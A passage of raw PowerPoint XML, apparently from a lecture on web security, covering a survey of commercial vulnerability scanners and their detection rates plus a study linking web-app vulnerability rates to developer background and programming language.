        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="3840163"/>
            <a:ext cx="1222375" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32775" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1320800" y="1455738"/>
            <a:ext cx="7143750" cy="422275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Local                                           Remote</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32776" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4978400" y="5761038"/>
            <a:ext cx="3697288" cy="355600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;$100K total retail price</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32777" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6697663" y="2468563"/>
            <a:ext cx="900112" cy="512762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32778" name="Picture 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="3475038"/>
            <a:ext cx="1314450" cy="296862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32779" name="Title 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Survey of Web Vulnerability Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32780" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="182563" y="2674938"/>
            <a:ext cx="1530350" cy="806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Example scanner UI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33795" name="Content Placeholder 3" descr="mcafee.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="461963" y="1216025"/>
            <a:ext cx="8461375" cy="4979988"/>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Test Vectors By Category</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34819" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="1362075"/>
            <a:ext cx="6172200" cy="5089525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34820" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="6391275"/>
            <a:ext cx="4170363" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="82296" tIns="41148" rIns="82296" bIns="41148">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Test Vector Percentage Distribution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457200" y="2193925"/>
            <a:ext cx="8229600" cy="3140075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35843" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="1371600"/>
            <a:ext cx="11113" cy="11113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35844" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="525463" y="5418138"/>
            <a:ext cx="8183562" cy="1052512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Good: Info leak, Session</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Decent: XSS/SQLI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Poor: XCS, CSRF (low vector count?)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35845" name="Title 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Detecting Known Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1165225"/>
            <a:ext cx="8777288" cy="909638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Vulnerabilities for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>revious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t> versions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Drupal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>, phpBB2, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>WordPress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              <a:sym typeface="Gill Sans" charset="0"/>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2779"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1524000"/>
            <a:ext cx="8001000" cy="4805363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Vulnerability Detection</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Secure development</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923"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72958829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Study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factors most strongly influence the likely security of a new web site?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Developer training?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Developer team and commitment?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>freelancer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> stock options in startup?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Programming language?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Library, development framework?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How do we tell?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can we use automated tools to reliably </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>measure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>security in order to answer the question above?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166956399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Develop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a web application vulnerability metric</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Combine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>reports of 4 leading commercial black </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>box vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>scanners and </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Evaluate vulnerability metric </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>using historical benchmarks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and our new sample of applications. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use vulnerability metric to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>examine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the impact of three factors on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>security: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>startup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>company </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>or freelancers </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>developer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>knowledge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Programming language framework </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361995588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Evaluate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>27 web applications </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>19 Silicon Valley startups and 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>outsourcing freelancers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5 programming languages. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>orrelate vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>rate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>eveloped </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by startup company or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>freelancers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xtent of developer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>security knowledge (assessed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>quiz)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>rogramming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>language used. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3797883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US" dirty="0" smtClean="0"/>
              <a:t>Database queries with PHP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1381379" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Sample PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
